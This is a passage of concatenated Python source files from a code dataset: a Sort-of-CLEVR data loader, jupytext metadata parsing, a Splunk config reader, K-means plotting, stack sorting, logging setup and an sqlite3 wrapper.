'sort-of-clevr.pickle' \n self.transform = transform \n self.nb_objects = nb_objects\n self.test_id_analogy = test_id_analogy\n self.test_id_analogy_threshold = test_id_analogy_threshold\n assert self.test_id_analogy_threshold < self.nb_objects,\\\n \"Looks like you are trying to test analogy without enough \\\n supporting evidence.\"\n\n if not self._check_exists():\n if generate:\n dataset = self._generate(root=root,\n dataset_size=dataset_size,\n img_size=img_size,\n object_size=object_size,\n nb_objects=nb_objects)\n else:\n raise RuntimeError('Dataset not found. You can use download=True to download it')\n else:\n filepath = os.path.join(self.root, self.file)\n with open(filepath, 'rb') as f:\n dataset = pickle.load(f)\n \n self.train = train \n # TODO: handle train tes tsplit:\n\n self.imgs = np.asarray(dataset['imgs'])\n self.latents_values = np.asarray(dataset['latents_values'])\n #(color, shape, X, Y) :\n self.latents_classes = np.asarray(dataset['latents_classes'])\n self.latents_one_hot = np.asarray(dataset['latents_one_hot'])\n \n self.relational_qs = {idx:np.stack(dataset[f'relational_qs_{idx}']) for idx in range(3)}\n self.non_relational_qs = {idx:np.stack(dataset[f'non_relational_qs_{idx}']) for idx in range(3)}\n self.relational_as = {idx:np.stack(dataset[f'relational_as_{idx}']) for idx in range(3)}\n self.non_relational_as = {idx:np.stack(dataset[f'non_relational_as_{idx}']) for idx in range(3)}\n\n sampling_indices = np.random.randint(len(self.imgs), size=test_size)\n if self.train:\n sampling_indices = [idx for idx in range(len(self.imgs)) if idx not in sampling_indices]\n\n self.imgs = self.imgs[sampling_indices]\n self.latents_values = self.latents_values[sampling_indices]\n self.latents_classes = self.latents_classes[sampling_indices]\n self.latents_one_hot = self.latents_one_hot[sampling_indices]\n\n self.relational_qs = {k:v[sampling_indices] for k,v in self.relational_qs.items()}\n self.non_relational_qs = {k:v[sampling_indices] for k,v in self.non_relational_qs.items()}\n self.relational_as = {k:v[sampling_indices] for k,v in self.relational_as.items()}\n self.non_relational_as = {k:v[sampling_indices] for k,v in self.non_relational_as.items()}\n\n self.targets = np.zeros(len(self.latents_classes))\n weights = [np.power(2,idx) for idx in range(self.nb_objects)]\n\n for idx, latent_cls in enumerate(self.latents_classes):\n img_shapes = [latent_cls[idx_shape] \n for idx_shape in range(1,self.nb_objects*4, 4)\n ]\n img_shapes = [sh*w for sh, w in zip(img_shapes,weights)]\n target = sum(img_shapes)\n self.targets[idx] = target\n\n\n def __len__(self) -> int:\n return len(self.imgs)\n \n def _check_exists(self):\n return os.path.exists(os.path.join(self.root,self.file))\n\n def _generate(self, \n root,\n dataset_size,\n img_size,\n object_size,\n nb_objects):\n \"\"\"\n Generate the Sort-of-CLEVR dataset if it doesn't exist already.\n \"\"\"\n if root is None:\n root = self.root\n os.makedirs(root, exist_ok=True)\n return generate_dataset(root=root,\n dataset_size=dataset_size,\n img_size=img_size,\n object_size=object_size,\n nb_objects=nb_objects\n )\n\n def getclass(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n target = self.targets[idx]\n return target\n\n def getlatentvalue(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_value = self.latents_values[idx]\n return latent_value\n\n def getlatentclass(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_class = self.latents_classes[idx]\n return latent_class\n\n def getlatentonehot(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_one_hot = self.latents_one_hot[idx]\n return latent_one_hot\n\n def __getitem__(self, idx):\n \"\"\"\n Args:\n idx (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n if idx >= len(self):\n idx = idx%len(self)\n\n img = self.imgs[idx]\n target = self.getclass(idx)\n latent_value = torch.from_numpy(self.getlatentvalue(idx))\n latent_class = torch.from_numpy(self.getlatentclass(idx))\n latent_one_hot = torch.from_numpy(self.getlatentonehot(idx))\n \n relational_questions = {f\"relational_questions_{k}\":torch.from_numpy(v[idx]).float() for k,v in self.relational_qs.items()}\n non_relational_questions = {f\"non_relational_questions_{k}\":torch.from_numpy(v[idx]).float() for k,v in self.non_relational_qs.items()}\n \n relational_answers = {f\"relational_answers_{k}\":torch.from_numpy(v[idx]).long() for k,v in self.relational_as.items()}\n non_relational_answers = {f\"non_relational_answers_{k}\":torch.from_numpy(v[idx]).long() for k,v in self.non_relational_as.items()}\n \n # Do we test the analogy on the color/object_id?\n if self.test_id_analogy:\n # Let us reserve the QAs with regard to color/object_id greater than the given threshold:\n for (strq,poqs), (stra,poas) in zip(relational_questions.items(), relational_answers.items()):\n if self.train:\n # Only take the first ones:\n relational_questions[strq] = poqs[:self.test_id_analogy_threshold,...]\n relational_answers[stra] = poas[:self.test_id_analogy_threshold,...]\n else:\n # Only take the last ones:\n relational_questions[strq] = poqs[self.test_id_analogy_threshold:,...]\n relational_answers[stra] = poas[self.test_id_analogy_threshold:,...]\n\n for (strq,poqs), (stra,poas) in zip(non_relational_questions.items(), non_relational_answers.items()):\n if self.train:\n # Only take the first ones:\n non_relational_questions[strq] = poqs[:self.test_id_analogy_threshold,...]\n non_relational_answers[stra] = poas[:self.test_id_analogy_threshold,...]\n else:\n # Only take the last ones:\n non_relational_questions[strq] = poqs[self.test_id_analogy_threshold:,...]\n non_relational_answers[stra] = poas[self.test_id_analogy_threshold:,...]\n\n #img = (img*255).astype('uint8').transpose((2,1,0))\n img = img.transpose((2,1,0))\n img = Image.fromarray(img, mode='RGB')\n\n if self.transform is not None:\n img = self.transform(img)\n \n sampled_d = {\n \"experiences\":img, \n \"exp_labels\":target, \n \"exp_latents\":latent_class, \n \"exp_latents_values\":latent_value,\n \"exp_latents_one_hot\":latent_one_hot\n }\n \n sampled_d.update(relational_questions)\n sampled_d.update(non_relational_questions)\n\n sampled_d.update(relational_answers)\n sampled_d.update(non_relational_answers)\n\n return sampled_d","sub_path":"ReferentialGym/datasets/sort_of_CLEVR_dataset.py","file_name":"sort_of_CLEVR_dataset.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162311887","text":"\"\"\"\nConvert between text notebook metadata and jupyter cell metadata.\n\nSee also https://ipython.org/ipython-doc/3/notebook/nbformat.html#cell-metadata\n\nmetadata.hide_input and metadata.hide_output are documented here:\nhttp://jupyter-contrib-nbextensions.readthedocs.io/en/latest/nbextensions/runtools/readme.html\n\nTODO: Update this if a standard gets defined at\nhttps://github.com/jupyter/notebook/issues/3700\n\nNote: Nteract uses \"outputHidden\" and \"inputHidden\". We may want to switch\nto those.\n\"\"\"\n\nimport ast\nimport json\nimport re\n\nfrom .languages import _JUPYTER_LANGUAGES\n\ntry:\n unicode # Python 2\nexcept NameError:\n unicode = str # Python 3\n\n_BOOLEAN_OPTIONS_DICTIONARY = [('hide_input', 'echo', True),\n ('hide_output', 'include', True)]\n_IGNORE_METADATA = ['collapsed', 'autoscroll', 'scrolled',\n 'deletable', 'format', 'trusted', 'skipline',\n 'noskipline', 'lines_to_next_cell',\n 'lines_to_end_of_cell_marker']\n_PERCENT_CELL = re.compile(\n r'(# |#)%%([^\\{\\[]*)(|\\[raw\\]|\\[markdown\\])([^\\{\\[]*)(|\\{.*\\})\\s*$')\n\n\ndef _r_logical_values(pybool):\n return 'TRUE' if pybool else 'FALSE'\n\n\nclass RLogicalValueError(Exception):\n \"\"\"Incorrect value for R boolean\"\"\"\n pass\n\n\nclass RMarkdownOptionParsingError(Exception):\n \"\"\"Error when parsing Rmd cell options\"\"\"\n pass\n\n\ndef _py_logical_values(rbool):\n if rbool in ['TRUE', 'T']:\n return True\n if rbool in ['FALSE', 'F']:\n return False\n raise RLogicalValueError\n\n\ndef metadata_to_rmd_options(language, metadata):\n \"\"\"\n Convert language and metadata information to their rmd representation\n :param language:\n :param metadata:\n :return:\n \"\"\"\n options = (language or 'R').lower()\n metadata = filter_metadata(metadata)\n if 'name' in metadata:\n options += ' ' + metadata['name'] + ','\n del metadata['name']\n for jupyter_option, rmd_option, rev in _BOOLEAN_OPTIONS_DICTIONARY:\n if jupyter_option in metadata:\n options += ' {}={},'.format(\n rmd_option, _r_logical_values(metadata[jupyter_option] != rev))\n del metadata[jupyter_option]\n for opt_name in metadata:\n opt_value = metadata[opt_name]\n opt_name = opt_name.strip()\n if opt_name == 'active':\n options += ' {}=\"{}\",'.format(opt_name, str(opt_value))\n elif isinstance(opt_value, bool):\n options += ' {}={},'.format(\n opt_name, 'TRUE' if opt_value else 'FALSE')\n elif isinstance(opt_value, list):\n options += ' {}={},'.format(\n opt_name, 'c({})'.format(\n ', '.join(['\"{}\"'.format(str(v)) for v in opt_value])))\n else:\n options += ' {}={},'.format(opt_name, str(opt_value))\n if not language:\n options = options[2:]\n return options.strip(',').strip()\n\n\ndef update_metadata_from_rmd_options(name, value, metadata):\n \"\"\"\n Update metadata using the _BOOLEAN_OPTIONS_DICTIONARY mapping\n :param name: option name\n :param value: option value\n :param metadata:\n :return:\n \"\"\"\n for jupyter_option, rmd_option, rev in _BOOLEAN_OPTIONS_DICTIONARY:\n if name == rmd_option:\n try:\n metadata[jupyter_option] = _py_logical_values(value) != rev\n return True\n except RLogicalValueError:\n pass\n return False\n\n\nclass ParsingContext:\n \"\"\"\n Class for determining where to split rmd options\n \"\"\"\n parenthesis_count = 0\n curly_bracket_count = 0\n square_bracket_count = 0\n in_single_quote = False\n in_double_quote = False\n\n def __init__(self, line):\n self.line = line\n\n def in_global_expression(self):\n \"\"\"Currently inside an expression\"\"\"\n return (self.parenthesis_count == 0 and self.curly_bracket_count == 0\n and self.square_bracket_count == 0\n and not self.in_single_quote and not self.in_double_quote)\n\n def count_special_chars(self, char, prev_char):\n \"\"\"Update parenthesis counters\"\"\"\n if char == '(':\n self.parenthesis_count += 1\n elif char == ')':\n self.parenthesis_count -= 1\n if self.parenthesis_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing parentheses'.format(self.line))\n elif char == '{':\n self.curly_bracket_count += 1\n elif char == '}':\n self.curly_bracket_count -= 1\n if self.curly_bracket_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing curly brackets'.format(self.line))\n elif char == '[':\n self.square_bracket_count += 1\n elif char == ']':\n self.square_bracket_count -= 1\n if self.square_bracket_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing square brackets'.format(self.line))\n elif char == \"'\" and prev_char != '\\\\':\n self.in_single_quote = not self.in_single_quote\n elif char == '\"' and prev_char != '\\\\':\n self.in_double_quote = not self.in_double_quote\n\n\ndef parse_rmd_options(line):\n \"\"\"\n Given a R markdown option line, returns a list of pairs name,value\n :param line:\n :return:\n \"\"\"\n parsing_context = ParsingContext(line)\n\n result = []\n prev_char = ''\n\n name = ''\n value = ''\n\n for char in ',' + line + ',':\n if parsing_context.in_global_expression():\n if char == ',':\n if name != '' or value != '':\n if result and name == '':\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has no name for '\n 'option value {}'.format(line, value))\n result.append((name.strip(), value.strip()))\n name = ''\n value = ''\n elif char == '=':\n if name == '':\n name = value\n value = ''\n else:\n value += char\n else:\n parsing_context.count_special_chars(char, prev_char)\n value += char\n else:\n parsing_context.count_special_chars(char, prev_char)\n value += char\n prev_char = char\n\n if not parsing_context.in_global_expression():\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" is not properly terminated'.format(line))\n\n return result\n\n\ndef rmd_options_to_metadata(options):\n \"\"\"\n Parse rmd options and return a metadata dictionary\n :param options:\n :return:\n \"\"\"\n options = re.split(r'\\s|,', options, 1)\n if len(options) == 1:\n language = options[0]\n chunk_options = []\n else:\n language, others = options\n language = language.rstrip(' ,')\n others = others.lstrip(' ,')\n chunk_options = parse_rmd_options(others)\n\n language = 'R' if language == 'r' else language\n metadata = {}\n for i, opt in enumerate(chunk_options):\n name, value = opt\n if i == 0 and name == '':\n metadata['name'] = value\n continue\n else:\n if update_metadata_from_rmd_options(name, value, metadata):\n continue\n if name == 'active':\n metadata[name] = value.replace('\"', '').replace(\"'\", '')\n continue\n try:\n metadata[name] = _py_logical_values(value)\n continue\n except RLogicalValueError:\n metadata[name] = value\n\n for name in metadata:\n try_eval_metadata(metadata, name)\n\n if 'active' in metadata and 'eval' in metadata:\n del metadata['eval']\n\n return language, metadata\n\n\ndef md_options_to_metadata(options):\n \"\"\"Parse markdown options and return language and metadata (cell name)\"\"\"\n language = None\n name = None\n\n options = [opt for opt in options.split(' ') if opt != '']\n if len(options) >= 2:\n language, name = options[:2]\n elif options:\n language = options[0]\n\n if language:\n for lang in _JUPYTER_LANGUAGES + ['julia', 'scheme', 'c++']:\n if language.lower() == lang.lower():\n if name:\n return lang, {'name': name}\n return lang, {}\n\n return None, {'name': language}\n\n return None, {}\n\n\ndef try_eval_metadata(metadata, name):\n \"\"\"Evaluate given metadata to a python object, if possible\"\"\"\n value = metadata[name]\n if not isinstance(value, (str, unicode)):\n return\n if value.startswith('\"') or value.startswith(\"'\"):\n return\n if value.startswith('c(') and value.endswith(')'):\n value = '[' + value[2:-1] + ']'\n elif value.startswith('list(') and value.endswith(')'):\n value = '[' + value[5:-1] + ']'\n try:\n metadata[name] = ast.literal_eval(value)\n except (SyntaxError, ValueError):\n return\n\n\ndef json_options_to_metadata(options, add_brackets=True):\n \"\"\"Read metadata from its json representation\"\"\"\n try:\n options = json.loads('{' + options + '}' if add_brackets else options)\n return options\n except ValueError:\n return {}\n\n\ndef filter_metadata(metadata):\n \"\"\"Filter technical metadata\"\"\"\n return {k: metadata[k] for k in metadata if k not in _IGNORE_METADATA}\n\n\ndef metadata_to_json_options(metadata):\n \"\"\"Represent metadata as json text\"\"\"\n return json.dumps(metadata)\n\n\ndef is_active(ext, metadata):\n \"\"\"Is the cell active for the given file extension?\"\"\"\n if 'active' not in metadata:\n return True\n return ext.replace('.', '') in re.split('\\\\.|,', metadata['active'])\n\n\ndef double_percent_options_to_metadata(options):\n \"\"\"Parse double percent options\"\"\"\n matches = _PERCENT_CELL.findall('# %%' + options)[0]\n # Fifth match are JSON metadata\n if matches[4]:\n metadata = json_options_to_metadata(matches[4], add_brackets=False)\n else:\n metadata = {}\n\n # Third match is cell type\n cell_type = matches[2]\n if cell_type:\n metadata['cell_type'] = cell_type[1:-1]\n\n # Second and fourth match are description\n title = [matches[i].strip() for i in [1, 3]]\n title = [part for part in title if part]\n if title:\n title = ' '.join(title)\n cell_depth = 0\n while title.startswith('%'):\n cell_depth += 1\n title = title[1:]\n\n if cell_depth:\n metadata['cell_depth'] = cell_depth\n metadata['title'] = title.strip()\n\n return metadata\n\n\ndef metadata_to_double_percent_options(metadata):\n \"\"\"Metadata to double percent lines\"\"\"\n options = []\n if 'cell_depth' in metadata:\n options.append('%' * metadata.pop('cell_depth'))\n if 'title' in metadata:\n options.append(metadata.pop('title'))\n if 'cell_type' in metadata:\n options.append('[{}]'.format(metadata.pop('cell_type')))\n if metadata:\n options.append(metadata_to_json_options(metadata))\n return ' '.join(options)\n","sub_path":"jupytext/cell_metadata.py","file_name":"cell_metadata.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401788489","text":"import xml.dom.minidom as xdm\nimport logging\nimport logging.handlers\nfrom splunk.appserver.mrsparkle.lib.util import make_splunkhome_path\n\n\ndef setup_logging(log_name, level_name=\"INFO\"):\n level_name = level_name.upper() if level_name else \"INFO\"\n loglevel_map = {\n \"DEBUG\": logging.DEBUG,\n \"INFO\": logging.INFO,\n \"WARN\": logging.WARN,\n \"ERROR\": logging.ERROR,\n }\n\n if level_name in loglevel_map:\n loglevel = loglevel_map[level_name]\n else:\n loglevel = logging.INFO\n\n logfile = make_splunkhome_path([\"var\", \"log\", \"splunk\",\n \"%s.log\" % log_name])\n logger = logging.getLogger(log_name)\n logger.propagate = False\n logger.setLevel(loglevel)\n\n handler_exists = any([True for h in logger.handlers\n if h.baseFilename == logfile])\n if not handler_exists:\n file_handler = logging.handlers.RotatingFileHandler(logfile, mode=\"a\",\n maxBytes=104857600,\n backupCount=5)\n fmt_str = \"%(asctime)s %(levelname)s %(thread)d - %(message)s\"\n formatter = logging.Formatter(fmt_str)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger\n\n\ndef parse_configs(config_str, logger=logging):\n configs = []\n doc = xdm.parseString(config_str)\n root = doc.documentElement\n conf = root.getElementsByTagName(\"configuration\")[0]\n if not conf:\n logger.error(\"Invalid config, missing configuration section\")\n raise Exception(\"Invalid config, missing configuration section\")\n\n stanzas = conf.getElementsByTagName(\"stanza\")\n if not stanzas:\n logger.error(\"Invalid config, missing stanza\")\n raise Exception(\"Invalid config, missing stanza\")\n\n for stanza in stanzas:\n config = {}\n stanza_name = stanza.getAttribute(\"name\")\n if not stanza_name:\n logger.error(\"Invalid config, missing name\")\n raise Exception(\"Invalid config, missing name\")\n\n config[\"name\"] = stanza_name\n params = stanza.getElementsByTagName(\"param\")\n for param in params:\n name = param.getAttribute(\"name\")\n if (name and param.firstChild and\n param.firstChild.nodeType == param.firstChild.TEXT_NODE):\n config[name] = param.firstChild.data\n config[\"duration\"] = int(config[\"duration\"])\n config[\"priority\"] = int(config[\"priority\"])\n configs.append(config)\n return configs\n\n\ndef encrypt_username_password(app, configs):\n pass\n","sub_path":"SplunkApps/Splunk_TA_EMC/bin/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13980780","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import cm as cm\n\nfrom KMeans.Common.CalculateMidPointWithCentroidsAnswer import CalculateMidPointWithCentroidsAnswer\nfrom KMeans.Common.KMeansEnsembleResult import KMeansEnsembleResult\nfrom KMeans.TwoDimensional.TwoDimensionalData import TwoDimensionalData\n\n\nclass PlotTwoDimensionalData:\n def __init__(\n self,\n random_data: TwoDimensionalData,\n ensemble_results: KMeansEnsembleResult,\n mid_points01: CalculateMidPointWithCentroidsAnswer) -> None:\n super().__init__()\n self.mid_points01: CalculateMidPointWithCentroidsAnswer = mid_points01\n self.random_data: TwoDimensionalData = random_data\n self.ensemble_results: KMeansEnsembleResult = ensemble_results\n\n\n def image01(self):\n plt.figure()\n colors = iter(cm.rainbow(np.linspace(0, 1, self.random_data.ensemble_count)))\n\n for iteration in self.ensemble_results:\n data_point = iteration.dataset_indexes\n color = next(colors)\n plt.scatter(\n x=self.random_data.input_data[data_point, 0],\n y=self.random_data.input_data[data_point, 1],\n color=color,\n marker='.')\n\n plt.show()\n\n def image02(self):\n plt.figure()\n self.paint_centroids()\n plt.show()\n\n def paint_centroids(self):\n colors = iter(cm.rainbow(np.linspace(0, 1, self.random_data.ensemble_count)))\n for data_point in self.ensemble_results:\n color = next(colors)\n plt.scatter(\n x=data_point.centroids[:, 0],\n y=data_point.centroids[:, 1],\n color=color,\n marker='o')\n\n def paint_mid_points01(self):\n for mid_point in self.mid_points01:\n for p in mid_point:\n data = np.vstack((mid_point.mid_point, p))\n plt.plot(data[:, 0], data[:,1], color='black')\n plt.scatter(\n x=mid_point.mid_point[0],\n y=mid_point.mid_point[1],\n color='black',\n marker='X')\n\n\n\n def image03(self):\n plt.figure()\n self.paint_centroids()\n self.paint_mid_points01()\n\n plt.show()\n\n def plot(self):\n self.image01()\n self.image02()\n self.image03()\n","sub_path":"KMeans/Python/KMeans/TwoDimensional/PlotTwoDimensionalData.py","file_name":"PlotTwoDimensionalData.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"358746708","text":"from mst import PyMaxSpanTree\nimport numpy as np\n\n\nclass DependencyTree(object):\n def __init__(self):\n self.edges = []\n self.node_depths = {}\n self.deps = {}\n self.height = None\n\n def __repr__(self):\n template = '\\nHeight: {0.height} ' \\\n '\\nDependencies: {0.deps}' \\\n '\\nEdges: {0.edges}' \\\n '\\nNode Depths: {0.node_depths}'\n return template.format(self)\n\n def parse_tree(self, mst_tree):\n for pidx, cidx, weight in mst_tree:\n pidx = int(pidx)\n cidx = int(cidx)\n self.edges.append(Edge(pidx, cidx, weight))\n if pidx in self.deps:\n self.deps[pidx].append(cidx)\n else:\n self.deps[pidx] = [cidx]\n\n self._set_height()\n self._set_node_depths()\n\n def _set_height(self):\n self.height = len(self.deps.keys())\n\n def _set_node_depths(self):\n for parent_num, parent in enumerate(self.deps.keys()):\n self.node_depths[parent_num] = len(self.deps[parent])\n\n\nclass Edge(object):\n def __init__(self, srcidx, tgtidx, weight):\n self.src_idx = srcidx\n self.tgt_idx = tgtidx\n self.weight = weight\n\n def __repr__(self):\n return str(self.src_idx)+\"-\"+str(self.tgt_idx)+\",\"+str(self.weight)\n\n\ndef calculate_tree(docs):\n mst_obj = PyMaxSpanTree()\n for doc in docs:\n dep_tree = DependencyTree()\n str_scores = np.delete(doc.str_scores, 0, 0) # delete first row for ROOT being the child\n mst_tree = mst_obj.get_tree(str_scores)\n dep_tree.parse_tree(mst_tree)\n doc.tree = dep_tree\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"postprocess/dependency_tree.py","file_name":"dependency_tree.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589310016","text":"import sys\n\nsys.stdin = open(\"input.txt\",\"r\")\n\nn,m = tuple(map(int,sys.stdin.readline().rstrip().split()))\nr,c,d = tuple(map(int,sys.stdin.readline().rstrip().split()))\ncurrent = (r,c)\n\nboard = [[int(i) for i in sys.stdin.readline().rstrip().split()] for j in range(n)]\ncheck = [[0 for i in range(m)] for j in range(n)]\n\ndirection = {0:[(0,-1),(1,0),(0,1),(-1,0)],\n 1:[(-1,0),(0,-1),(1,0),(0,1)],\n 2:[(0,1),(-1,0),(0,-1),(1,0)],\n 3:[(1,0),(0,1),(-1,0),(0,-1)]}\n\ndirection_change = {0:3,1:0,2:1,3:2}\n\nclean = 0\nend = 0\n\ndef inRange(a,b):\n if 0<=a data:\n self.buffer.push(self.main.pop())\n self.content()\n self.main.push(data)\n self.content()\n while self.buffer.top is not None:\n self.main.push(self.buffer.pop())\n self.content()\n\n def pop(self):\n self.main.pop()\n\n def peek(self):\n return self.main.peek()\n\n def is_empty(self):\n return self.main.size == 0\n\n def content(self):\n print('Main:', end=' '), self.main.output()\n print('Buffer:', end=' '), self.buffer.output()\n print()\n\n\ndef sorting(unsorted):\n result = Stack()\n while not unsorted.isEmpty():\n temporary = unsorted.pop()\n while not result.isEmpty() and result.peek() > temporary:\n unsorted.push(result.pop())\n result.push(temporary)\n return result\n\n\nif __name__ == '__main__':\n import random\n test_array = [round(random.random(), 2) for i in range(8)]\n\n unsorted = Stack()\n for i in test_array:\n unsorted.push(i)\n unsorted.output()\n unsorted = sorting(unsorted)\n unsorted.output()\n\n # ordered = AscendingOrder()\n # print('Test ascending order while push the data\\n')\n # for i in test_array:\n # ordered.push(i)\n # print(ordered.peek(), '\\n')\n #\n # print('Test popping')\n # ordered.pop()\n # print(ordered.peek())\n # ordered.pop()\n # print(ordered.peek())\n\n","sub_path":"experiments/34_question_and_solutions/03_stacks_and_queues/ascending_order.py","file_name":"ascending_order.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59898022","text":"#main module\nimport exceptionhandling as t\nimport conversion as c\nimport calculation as cal\n\ndef main_method():\n m=True\n while m==True:\n print((\"\\n\"))\n actualbinarynum=\"\"\n num1,num2=t.num_valid()\n binary_1=c.conv(num1)\n binary_2=c.conv(num2)\n l1=c.dectobin(num1)\n l3=c.dectobin(num2)\n a=l1\n b=l3\n actual_result=cal.calculate_result(b,a)\n Result=actual_result\n Result.reverse()\n actual=actual_result\n l=c.bintodec(actual_result)\n for i in range (len(actual)-1,-1,-1):\n actualbinarynum = actualbinarynum+str(actual[i])\n a.reverse()\n b.reverse()\n print((\"\\n\"))\n print(\"The first Number you entered is:\",num1)\n print(\"The conversion of first number in list is:\",a)\n print(\"The binary conversion of the first number is:\",binary_1)\n print((\"\\n\"))\n print(\"The second number you entered is:\",num2)\n print(\"The conversion of second number in list is:\",b)\n print(\"The binary conversion of the second number is:\",binary_2)\n print((\"\\n\"))\n print(\"The sum of numbers in binary in list is:\",Result)\n print(\"The sum of the number in binary is:\",actualbinarynum)\n print(\"The final result in Decimal is:\",l)\n print((\"\\n\"))\n cont=input(\"Do you wish to continue ?(Y/N)\")\n if cont.upper()==\"Y\":\n m= True\n elif cont.upper()==\"N\":\n \n m= False\n \nif __name__=='__main__':\n main_method()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62662419","text":"import logging\nimport os\nfrom common import constant\nfrom common.ConfTools import DoConf\n\n\nclass LogTools:\n\n def __init__(self, login_name):\n conf = DoConf(constant.globe_conf_dir)\n # 定义一个日志收集器\n self.mylog = logging.getLogger(login_name)\n # 设置收集级别\n self.mylog.setLevel(conf.get_value('log_level', 'info'))\n\n # 设置日志输出格式\n famatter = logging.Formatter(conf.get_value('log_format', 'format'))\n # 设置日志控制台输出\n hdr = logging.StreamHandler()\n hdr.setLevel(conf.get_value('log_level', 'info'))\n hdr.setFormatter(famatter)\n\n # 设置日志文件输出\n fdr = logging.FileHandler(os.path.join(constant.log_dir, 'log_info.log'), encoding='utf-8')\n fdr.setLevel(conf.get_value('log_level', 'info'))\n fdr.setFormatter(famatter)\n\n # 日志与收集器对接\n self.mylog.addHandler(hdr)\n self.mylog.addHandler(fdr)\n\nif __name__ == '__main__':\n log = LogTools()\n log.info('测试数据123456')\n print(\"测试数据\")\n","sub_path":"qianchendai/common/LogTools.py","file_name":"LogTools.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168185824","text":"#!/usr/bin/env python3\r\n\r\nimport abc\r\nfrom typing import Dict, Any, Text, NoReturn, Tuple, Optional, List\r\n\r\nimport sqlite3\r\n\r\n\r\nclass Database:\r\n \"\"\" Sqlite3 database python handler \"\"\"\r\n\r\n def __init__(self, db_name: Text = 'chat_bot.db'):\r\n self._db_name = db_name\r\n self._conn = sqlite3.connect(db_name, 1000, check_same_thread=False)\r\n self._cur = None\r\n self._nest_index = 0\r\n with self as cur:\r\n cur.execute('PRAGMA foreign_keys = ON') # enable foreign keys\r\n\r\n @property\r\n def conn(self) -> sqlite3.Connection:\r\n return self._conn\r\n\r\n def insert(self, table, data: Dict[Text, Any]) -> NoReturn:\r\n values = tuple(data.values())\r\n formatted_keys = ','.join(data.keys())\r\n with self as cur:\r\n cur.execute(f'INSERT INTO {table} ({formatted_keys}) VALUES ({\"?\" + \",?\" * (len(values) - 1)})', values)\r\n\r\n def delete(self, table: Text, data: Dict[Text, Any]) -> NoReturn:\r\n cond = ' AND '.join((f'{key}=?' for key in data.keys()))\r\n with self as cur:\r\n cur.execute(f'DELETE FROM {table} WHERE {cond}', tuple(data.values()))\r\n\r\n def update(self, table: Text, set_mapper: Dict[Text, Any], cond_mapper: Dict[Text, Any]) -> NoReturn:\r\n cond = ' AND '.join((f'{key}=?' for key in cond_mapper.keys()))\r\n set_keys = ','.join((f'{key}=?' for key in set_mapper.keys()))\r\n args = tuple(set_mapper.values()) + tuple(cond_mapper.values())\r\n with self as cur:\r\n cur.execute(f'UPDATE {table} SET {set_keys} WHERE {cond}', args)\r\n\r\n def search_unique(self, table: str, data: Dict[Text, Any]) -> Any:\r\n cond = ' AND '.join((f'{key}=?' for key in data.keys()))\r\n with self as cur:\r\n return cur.execute(f'SELECT * FROM {table} WHERE {cond}', tuple(data.values())).fetchone()\r\n\r\n def all(self, table: Text) -> Any:\r\n with self as cur:\r\n return cur.execute(f'SELECT * FROM {table}').fetchall()\r\n\r\n def __enter__(self) -> sqlite3.Cursor:\r\n if not self._nest_index:\r\n self._cur = self._conn.cursor()\r\n self._nest_index += 1\r\n return self._cur\r\n\r\n def __exit__(self, *args, **kwargs):\r\n self._nest_index -= 1\r\n if not self._nest_index:\r\n self._conn.commit()\r\n self._cur.close()\r\n self._cur = None\r\n\r\n def __del__(self):\r\n self._conn.close()\r\n\r\n\r\nclass TableBase(abc.ABC):\r\n def __init__(self, database: Database):\r\n self.db = database\r\n\r\n\r\nclass ShoppingListTable(TableBase):\r\n TABLE_NAME = 'ShoppingList'\r\n DEFAULT_LIST = 'default'\r\n\r\n def __init__(self, database: Database):\r\n super().__init__(database)\r\n cmd = f'CREATE TABLE IF NOT EXISTS {self.TABLE_NAME}'\r\n columns = '(name VARCHAR(64) PRIMARY KEY)'\r\n with self.db as cur:\r\n cur.execute(cmd + columns)\r\n try:\r\n self.insert(self.DEFAULT_LIST)\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\n def get(self, name: Text) -> Dict[Text, Any]:\r\n return self._convert_query(self.db.search_unique(self.TABLE_NAME, dict(name=name)))\r\n\r\n def insert(self, name: Text) -> Any:\r\n with self.db:\r\n self.db.insert(self.TABLE_NAME, dict(name=name))\r\n return self.get(name)\r\n\r\n def delete(self, name: Text) -> NoReturn:\r\n self.db.delete(self.TABLE_NAME, dict(name=name))\r\n\r\n def all(self) -> List[Dict[Text, Any]]:\r\n data = self.db.all(self.TABLE_NAME)\r\n return list(map(self._convert_query, data))\r\n\r\n @staticmethod\r\n def _convert_query(data: Tuple[Text]):\r\n return dict(name=data[0])\r\n\r\n\r\nclass ItemTable(TableBase):\r\n 